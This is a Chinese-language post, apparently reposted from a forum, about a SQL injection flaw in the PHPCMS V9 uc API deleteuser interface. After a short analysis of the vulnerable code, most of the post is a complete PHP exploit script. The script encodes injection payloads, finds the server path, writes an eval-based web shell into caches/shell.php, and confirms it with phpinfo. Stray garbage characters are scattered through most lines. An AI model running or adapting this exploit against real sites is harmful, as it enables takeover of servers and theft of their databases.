PHPCMS V9 uc API SQL注入漏洞

admin

PHPCMS V9版于2010年推出，是应用较为广泛的建站工具。第三方数据显示，目前使用PHPCMS V9搭建的网站数量多达数十万个，包括联合国儿童基金会等机构网站，以及大批企业网站均使用PHPCMS V9搭建和维护。

所有使用PHPCMSV9搭建的网站均存在SQL注入漏洞，可能使黑客利用漏洞篡改网页、窃取数据库，甚至控制服务器。未启用ucenter服务的情况下，uc_key为空，define('UC_KEY', pc_base::load_config('system', 'uc_key'));deleteuser接口存在SQL注入漏洞。若MYSQL具有权限，可直接get webshell。

' N! {/ K6 a$ H7 _, Z* ^- y漏洞分析：
$ U7 L+ T0 h; o: K0 v0 Z1.未启用ucenter服务的情况下uc_key为空
3 y. ~% b8 n+ U% S% x7 o8 t8 C- |define('UC_KEY', pc_base::load_config('system', 'uc_key'));
( G3 H# ^, c1 r3 C0 V( J3 T2. deleteuser接口存在SQL注入漏洞，UC算法加密的参数无惧GPC,程序员未意识到$get['ids']会存在SQL注入情况。
  g$ e( _0 w; R9 H1 Z& y9 c" k$ Z, g# s/ k    public function deleteuser($get,$post) {
/ K, [6 H9 q& l+ L3 q        pc_base::load_app_func('global', 'admin');
        pc_base::load_app_class('messagequeue', 'admin' , 0);
3 I7 i! ~- L* N; m; |        $ids = new_stripslashes($get['ids']);
        $s = $this->member_db->select("ucuserid in ($ids)", "uid");
SQL语句为
9 S- x$ z: B: ~SELECT `uid` FROM `phpcmsv9`.`v9_sso_members` WHERE ucuserid in ($ids)
" T' c8 j+ Q+ F2 Y, ~
利用代码，随便拼了个EXP，找路径正则写得很挫有BUG，没有注其他表了，懒得改了，MYSQL有权限的话直接get webshell
<?php
print_r('
---------------------------------------------------------------------------
PHPcms (v9 or Old Version) uc api sql injection 0day
by rayh4c#80sec.com
---------------------------------------------------------------------------
');

+ G! y4 P7 j  S' |# U, Dif ($argc<3) {
, V- ~3 P+ v/ s, H* K5 a! c2 T6 n8 u    print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
path:      path to phpcms
" G6 ?- u) O* p8 [Options:
8 P0 O* g% K- O$ b -p[port]:    specify a port other than 80
-P[ip:port]: specify a proxy
Example:
) X9 j: [7 P8 _5 A/ }php '.$argv[0].' localhost /
php '.$argv[0].' localhost /phpcms/ -p81
php '.$argv[0].' localhost /phpcms/ -P1.1.1.1:80
7 ^# s) d& N8 L# x---------------------------------------------------------------------------
');
0 A* l& B- T( r    die;
1 F+ P2 v. X7 H- z9 g6 J0 D$ p% u}
. M" |! ^$ C6 z2 e3 R* _1 w
error_reporting(7);
$ X$ q% [8 y3 l2 Yini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
" j" }# N- G+ c$ m& ~
function quick_dump($string)
{
; S- \) g& F# _' s+ R  $result='';$exa='';$cont=0;
4 z' O+ n) |* j  for ($i=0; $i<=strlen($string)-1; $i++)
  {
: P) A& b+ g# f. F   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
4 a; n) L7 ^- K* i4 K( {   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
& k9 E7 S, M3 k1 p) c0 M5 }   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
% s4 A  V. E% A( v  }
return $exa."\r\n".$result;
: n+ `4 L2 I" X! `% f4 e3 r}
% y' N6 E5 z  w8 I% \" C$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
; `, b" U8 r/ y& U5 j
function send($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
& s9 q& p: g: T3 y  else {
        $c = preg_match($proxy_regex,$proxy);
% l: B8 Q5 C) `    if (!$c) {
      echo 'Not a valid proxy...';die;
5 R7 }4 q/ }" s# b4 O: _/ n# U2 D3 G3 R    }
( L7 o% g; R; Z3 ]8 b3 x2 M/ D. ]    $parts=explode(':',$proxy);
    $parts[1]=(int)$parts[1];
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
  d; u. g7 S0 }$ t7 [    $ock=fsockopen($parts[0],$parts[1]);
; x2 v9 O( Q# P* F# x" U1 j    if (!$ock) {
      echo 'No response from proxy...';die;
" b# N1 @* A/ P5 b0 d& V        }
  }
  fputs($ock,$packet);
# t' V4 z: |; t, L( \+ j: i  if ($proxy=='') {
  |5 p% V: q) Q' o8 p3 w  ]8 ]    $html='';
: y6 A- V3 m6 V6 I: o8 Q6 U$ a    while (!feof($ock)) {
, S% S0 @% ^* e8 ~      $html.=fgets($ock);
6 y& V$ ~$ l: o    }
* K% ^: w8 p5 _( W8 Y  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
0 |: A& T2 Z9 L8 X/ J3 E+ z3 W9 I      $html.=fread($ock,1);
    }
! x4 B- o1 L1 f# N  }
" q& q! g) T  M$ T  fclose($ock);
- q1 _8 I5 }# g" A}
! P! S- ?/ p  ]8 o" n5 g( `
3 E) K7 E) Z4 u. N$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
/ h" M% ]6 Q2 ^) J' pfor ($i=3; $i<$argc; $i++){
& l7 c( V2 t* [, p  w$ J4 t$temp=$argv[$i][0].$argv[$i][1];
  N6 v! z) I4 \; ]3 pif ($temp=="-p")
{
  $port=(int)str_replace("-p","",$argv[$i]);
1 }/ a: c# ^( s% @$ k; x}
5 N' ?6 l5 t+ Eif ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
; z* e) D9 ~, \: b% V}
8 W& `2 t( X5 C
: x3 C: g2 R0 \, q/ P: X- gif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
/ Y1 b3 c5 O4 @+ i$ Z" ]& yif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
  F9 @5 q& [8 `2 ]. s1 y- O
    $ckey_length = 4;
; g- s; k8 j, F( A2 f
    $key = md5($key ? $key : '');
    $keya = md5(substr($key, 0, 16));
- Y- ?8 [7 R* `/ Q$ |; h    $keyb = md5(substr($key, 16, 16));
3 v3 O6 ^  [- J* O- u3 t; ]: H    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
0 e1 a  Q% X6 L3 r
    $cryptkey = $keya.md5($keya.$keyc);
# }; Z# u+ G0 _2 ~7 p* c2 V, b0 ?    $key_length = strlen($cryptkey);
7 a" F" w# f/ |' r
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
, j5 r0 W  Q% W7 z; ~0 T/ k2 c# |    $string_length = strlen($string);

/ Q$ b" i9 p4 ?; P$ F    $result = '';
7 i7 I: \& p$ m- ^* I2 y2 w) K) l    $box = range(0, 255);

    $rndkey = array();
) C+ W0 j1 U6 L; L    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
) x1 d- x3 {8 L* O9 {    }
, d! {3 k- Q. c
6 Q7 y# ]1 C- ]5 E$ @$ ]6 j; l% ]    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
# b" ?# c, L; L6 A" p- I, K# s        $tmp = $box[$i];
+ b' w: b3 U$ v& L        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }

    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
0 F9 e" i* E: X% x0 W/ v8 }' u        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
+ {# W2 Z" E0 R5 W        $box[$a] = $box[$j];
3 g7 `* C/ T1 l        $box[$j] = $tmp;
. F6 E+ ?  s! D9 i        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
- n; f) L* m# O0 E2 n+ m, l    }

4 g$ G* h- |5 J" i9 o& @7 a8 S    if($operation == 'DECODE') {
+ W7 m; n( e9 u+ b; `8 h( {        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
' k' \9 j9 v: @+ K( e1 D            return substr($result, 26);
        } else {
            return '';
4 v: _+ T3 K6 E6 T; I( [# I+ a        }
    } else {
' z& \9 F& W( i# b% x7 ^/ `        return $keyc.str_replace('=', '', base64_encode($result));
  o9 Q/ \1 U% F' O    }
9 O) H6 a. Y: {: S% E9 C
6 v! K, \4 S$ t% H}
/ F( F2 i, L/ n- u- X& z7 A# C
# M1 j  o; T6 J; V$SQL = "time=999999999999999999999999&ids=1'&action=deleteuser";
$SQL = urlencode(authcode($SQL, "ENCODE", ""));
echo "[1] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
' q5 _) M7 Y+ e$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
) H) L) Z- I" u3 _% n; h/ G' D$packet.="User-Agent: Mozilla/5.0\r\n";
8 ~7 ^( h. ]+ c9 k8 X7 S5 {: p4 d$packet.="Host: ".$host."\r\n";
: N; ]: t$ I7 M" [  k$packet.="Connection: Close\r\n\r\n";
send($packet);
if(strpos($html,"MySQL Errno") > 0){
9 i. ^  n5 r( \echo "[2] 发现存在SQL注入漏洞"."\n";
echo "[3] 访问 http://".$host.$p."phpsso_server/api/logout.php \n";
) X! r4 o7 }8 W( u8 ?% G7 `$packet ="GET ".$p."phpsso_server/api/logout.php"." HTTP/1.0\r\n";
5 L; b7 Z$ T, r1 G3 }$packet.="User-Agent: Mozilla/5.0\r\n";
8 n: [8 U) h, t: B$packet.="Host: ".$host."\r\n";
) j$ D% i+ h# m* J$ W% g- i$packet.="Connection: Close\r\n\r\n";
send($packet);
preg_match('/[A-Za-z]?[:]?[\/\x5c][^<^>]+[\/\x5c]phpsso_server[\/\x5c]/',$html, $matches);
//print_r($matches);
if(!empty($matches)){
9 r) o- U: [& [echo "[4] 得到web路径 " . $matches[0]."\n";
2 F  _$ S) {0 B+ K5 p1 L* Eecho "[5] 尝试写入文件 ". str_replace("\\","/",$matches[0]) ."caches/shell.php"."\n";
1 n0 h" l6 ?& t% E- E. Y$SQL = "time=999999999999999999999999&ids=1)";
$SQL.=" and 1=2 union select '<?php eval($"."_REQUEST[a]);?>' into outfile '". str_replace("\\","/",$matches[0]) ."caches/shell.php'#";
; |6 n7 v" v" t& D% k$SQL.="&action=deleteuser";
; I6 G9 F" Z3 Q$SQL = urlencode(authcode($SQL, "ENCODE", ""));
' k/ O! T# t3 f8 B- wecho "[6] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
' N4 X4 y6 D0 R$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
7 f+ C$ E& Z2 _+ s$packet.="Connection: Close\r\n\r\n";
send($packet);
if(strpos($html,"Access denied") > 0){
* h/ |' A6 N* l  J% M9 D9 ^echo "[-] MYSQL权限过低 禁止写入文件 ";
die;
}
echo "[6] 访问 http://".$host.$p."phpsso_server/caches/shell.php"."\n";
$packet ="GET ".$p."phpsso_server/caches/shell.php?a=phpinfo(); HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
- `  y% d# n9 _+ s- }1 v) z5 P3 i1 F$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
; E& D7 q' {/ w' U- G" hsend($packet);
4 Z' h+ K- H; x; }* |& s2 Cif(strpos($html,"<title>phpinfo()</title>") > 0){
echo "[7] 测试phpinfo成功！shell密码是a ! enjoy it ";
7 H) b+ U7 D9 }) R! h5 w3 H}
, ]1 I, @' {. v+ \}else{
echo "[-]未取到web路径 ";
}
- E" w; A1 ~1 F% q4 h3 c. v}else{
echo "[*]不存在SQL注入漏洞"."\n";
}
8 x; O1 Y, O( e) P
  n: d1 V' p3 f  h: r9 F: t?>